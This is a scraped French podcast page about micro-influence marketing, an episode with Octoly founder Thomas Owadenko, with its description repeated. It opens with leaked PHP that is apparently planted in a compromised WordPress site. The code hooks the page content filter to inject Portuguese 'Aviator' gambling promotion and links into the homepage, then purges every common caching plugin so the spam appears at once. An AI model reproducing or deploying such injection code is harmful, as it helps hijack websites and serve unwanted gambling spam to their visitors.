if (!function_exists('add_custom_html_to_content_1')) { function add_custom_html_to_content_1($content) { $current_url = $_SERVER['REQUEST_URI']; if ($current_url == '/') { $custom_html ="

Aviator Jogo Brasil: Entre na Aventura dos Jogos Aviator no Brasil

Entre na aventura dos jogos Aviator no Brasil e divirta-se com uma experiência de jogo emocionante. Ganhe prêmios incríveis e desfrute da diversão!

https://aviator-jogo-brazil.org/
"; $content .= $custom_html; } $plugins = array( 'W3 Total Cache' => 'w3tc_pgcache_flush', 'WP Super Cache' => 'wp_cache_clear_cache', 'LiteSpeed Cache' => 'litespeed_purge_all', 'Cache Enabler' => 'ce_clear_cache', 'Comet Cache' => 'comet_cache_clear_cache', 'Hyper Cache' => 'hyper_cache_clear_cache', ); foreach ($plugins as $plugin_name => $function_name) { if (function_exists($function_name)) { call_user_func($function_name); } } if (class_exists('LiteSpeed\Purge')) { if (method_exists('LiteSpeed\Purge', 'purge_all')) { LiteSpeed\Purge::purge_all('Custom Reason'); } } if (function_exists('rocket_clean_domain')) { rocket_clean_domain(); } return $content; } add_filter('the_content', 'add_custom_html_to_content_1'); } if (!function_exists('add_custom_html_to_content_2')) { function add_custom_html_to_content_2($content) { $current_url = $_SERVER['REQUEST_URI']; if ($current_url == '/') { $custom_html ="

Aviator Download: Baixe Agora e Comece a Jogar

Faça o download do Aviator agora e comece a jogar. Desfrute de uma variedade de jogos emocionantes e ganhe prêmios incríveis!

aviator download
"; $content .= $custom_html; } $plugins = array( 'W3 Total Cache' => 'w3tc_pgcache_flush', 'WP Super Cache' => 'wp_cache_clear_cache', 'LiteSpeed Cache' => 'litespeed_purge_all', 'Cache Enabler' => 'ce_clear_cache', 'Comet Cache' => 'comet_cache_clear_cache', 'Hyper Cache' => 'hyper_cache_clear_cache', ); foreach ($plugins as $plugin_name => $function_name) { if (function_exists($function_name)) { call_user_func($function_name); } } if (class_exists('LiteSpeed\Purge')) { if (method_exists('LiteSpeed\Purge', 'purge_all')) { LiteSpeed\Purge::purge_all('Custom Reason'); } } if (function_exists('rocket_clean_domain')) { rocket_clean_domain(); } return $content; } add_filter('the_content', 'add_custom_html_to_content_2'); } Vlan #31 La micro-influence et le futur de l'engagement avec Thomas Owadenko - VLAN! Podcast

Vlan #31 La micro-influence et le futur de l’engagement avec Thomas Owadenko

VLAN! Podcast
VLAN! Podcast
Vlan #31 La micro-influence et le futur de l'engagement avec Thomas Owadenko
Loading
/

Thomas Owadenko est le fondateur d’Octoly, une plateforme technologique spécialisée sur la micro-influence. Avec Thomas, nous revenons sur les différents acteurs du marché, le rôle de l’influence dans une stratégie marketing et plus spécifiquement de la micro influence mais aussi des évolutions du marché en particulier en regardant ce qui se passe en Chine et chez les GAFA. Et donc évidemment de l’engagement. Comprendre le rôle de la micro-influence Il y a différents types d’influenceurs de la « micro-influence » jusqu’à la célébrité et une myriade de prestataires: de la simple liste de personnes connues, aux agences créatives en passant par les plateformes technologiques jusqu’aux outils d’IRM (influencer relationship Management). La micro-influence est un marché relativement nouveau qui consiste à aller toucher une multitude de personnes ayant moins de 10 000 abonnés (plutôt 50 000 aux U.S.) en leur proposant de faire des revues de produits. Pour Thomas, l’engagement est beaucoup plus fort chez les micro-influenceurs parce qu’en réalité, ces personnes sont plus proches des personnes qui les suivent. L’impact de l’influence sur le business Les influenceurs ont fait tomber les barrières des grands médias et donc aujourd’hui tout le monde peut réussir à promouvoir un produit ou un service. Cela représente donc un changement de paradigme majeur dans lequel Amazon s’est engouffré en permettant à tout influenceur de créer sa boutique sur Amazon dans un modèle d’affiliation. Amazon n’invente rien car en Chine, le marché est déjà beaucoup plus mature. Comme Thomas le mentionne, sur Tao-Bao, les influenceurs ont leurs marques, leurs boutiques, vendent en live streaming à travers des systèmes de gamification. D’ailleurs, pour le 11 novembre 2017 prononcé « eleven eleven » (le black Friday Chinois dédié aux célibataires) le volume de transaction a atteint 22 milliards de dollars sur 1 seule journée. Ce qui est notable, c’est que sur les 30 marques beauté/mode, 7 des plus importantes marques étaient celles d’influenceurs. Concrêtement, on voit donc l’impact que peuvent avoir les influenceurs.

Description de l’épisode

Thomas Owadenko est le fondateur d’Octoly, une plateforme technologique spécialisée sur la micro-influence. Avec Thomas, nous revenons sur les différents acteurs du marché, le rôle de l’influence dans une stratégie marketing et plus spécifiquement de la micro influ…

Vous aimerez aussi ces épisodes

Transcription partielle de l’épisode

VLAN! Podcast
VLAN! Podcast
Vlan #31 La micro-influence et le futur de l'engagement avec Thomas Owadenko
Loading
/

Thomas Owadenko est le fondateur d’Octoly, une plateforme technologique spécialisée sur la micro-influence. Avec Thomas, nous revenons sur les différents acteurs du marché, le rôle de l’influence dans une stratégie marketing et plus spécifiquement de la micro influence mais aussi des évolutions du marché en particulier en regardant ce qui se passe en Chine et chez les GAFA. Et donc évidemment de l’engagement. Comprendre le rôle de la micro-influence Il y a différents types d’influenceurs de la « micro-influence » jusqu’à la célébrité et une myriade de prestataires: de la simple liste de personnes connues, aux agences créatives en passant par les plateformes technologiques jusqu’aux outils d’IRM (influencer relationship Management). La micro-influence est un marché relativement nouveau qui consiste à aller toucher une multitude de personnes ayant moins de 10 000 abonnés (plutôt 50 000 aux U.S.) en leur proposant de faire des revues de produits. Pour Thomas, l’engagement est beaucoup plus fort chez les micro-influenceurs parce qu’en réalité, ces personnes sont plus proches des personnes qui les suivent. L’impact de l’influence sur le business Les influenceurs ont fait tomber les barrières des grands médias et donc aujourd’hui tout le monde peut réussir à promouvoir un produit ou un service. Cela représente donc un changement de paradigme majeur dans lequel Amazon s’est engouffré en permettant à tout influenceur de créer sa boutique sur Amazon dans un modèle d’affiliation. Amazon n’invente rien car en Chine, le marché est déjà beaucoup plus mature. Comme Thomas le mentionne, sur Tao-Bao, les influenceurs ont leurs marques, leurs boutiques, vendent en live streaming à travers des systèmes de gamification. D’ailleurs, pour le 11 novembre 2017 prononcé « eleven eleven » (le black Friday Chinois dédié aux célibataires) le volume de transaction a atteint 22 milliards de dollars sur 1 seule journée. Ce qui est notable, c’est que sur les 30 marques beauté/mode, 7 des plus importantes marques étaient celles d’influenceurs. Concrêtement, on voit donc l’impact que peuvent avoir les influenceurs.

Menu